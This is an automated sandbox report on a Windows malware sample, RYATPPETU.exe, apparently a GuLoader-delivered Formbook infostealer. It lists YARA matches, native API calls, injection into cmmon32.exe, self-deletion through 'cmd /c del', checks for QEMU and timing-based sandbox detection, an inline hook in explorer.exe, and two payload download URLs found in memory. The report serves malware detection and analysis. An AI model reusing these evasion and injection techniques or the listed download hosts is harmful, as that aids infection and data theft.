Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BB270
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C16C5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C1A07
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BF407
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BB81C
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B8648
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C005C
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C0689
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B9095
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B373D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BE7B8
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B8BC8
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E696E30
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AEBB0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731002
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B090
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E741D55
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E670D20
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67F900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05062D07
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05061D55
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA841F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051002
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050620A8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F90D20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9F900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05062B28
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB6E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05061FF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCEBB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050622AE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05062EF7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFEBAB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFE1BB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD6F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFEECA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE9E4B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE9E50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE2D87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EE2D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFDD62

Source: C:\Windows\SysWOW64\cmmon32.exe

Code function: String function: 04F9B150 appears 35 times

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BB270 NtWriteVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C10AF NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A10 NtQuerySection,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B96D0 NtCreateKey,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9760 NtOpenProcess,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BA770 NtOpenThread,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BB040 NtSuspendThread,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9560 NtWriteFile,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6BAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B95D0 NtClose,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9560 NtWriteFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDA770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FDA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA350 NtCreateFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA480 NtClose,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA400 NtReadFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA530 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA3FA NtReadFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA3A2 NtReadFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA34A NtCreateFile,

Source: C:\Users\user\Desktop\RYATPPETU.exe

Process Stats: CPU usage > 98%

Source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RYATPPETU.exe
Source: RYATPPETU.exe, 00000008.00000002.613100559.0000000000119000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs RYATPPETU.exe

Source: RYATPPETU.exe	Virustotal: Detection: 31%
Source: RYATPPETU.exe	ReversingLabs: Detection: 27%

Source: RYATPPETU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\RYATPPETU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\RYATPPETU.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'

Source: C:\Users\user\Desktop\RYATPPETU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Users\user\Desktop\RYATPPETU.exe

File created: C:\Users\user\AppData\Local\Temp\~DF4B4CC365E00E9684.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/2

Source: RYATPPETU.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_01

Source: C:\Users\user\Desktop\RYATPPETU.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00406E6E push edi; iretd
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00403200 push 00401122h; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00403214 push 00401122h; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00403228 push 00401122h; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00402E34 push 00401122h; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00406537 push eax; iretd
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_004031C4 push 00401122h; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_004031D8 push 00401122h; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_004031EC push 00401122h; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_00405C9B push cs; iretd
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_0040659F push eax; iretd
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B0A23 push ebp; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B248F push ecx; retn F8CCh
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BD102 push ebx; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B6983 push esi; iretd
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B3FEA push ds; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022B4BF0 push es; retf
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6CD0D1 push ecx; ret
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_00572BD6 push es; retn 003Ch
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FED0D1 push ecx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EF7921 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA6CE push ecx; iretd
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFA7B8 push ebp; iretd
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD4FB push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD4F2 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD4A5 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFCC98 push 00000048h; retf
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFCC95 pushad ; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFC422 push edx; iretd
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EF5406 push es; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_02EFD55C push eax; ret

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe'

Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://BLUMECONSTRUCTIONLLC.COM/BIN_NXOEAEAGUQ10.BINHTTPS://SOLEPROTECT.DE/BIN_NXOEAEAGUQ10.BIN

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RYATPPETU.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
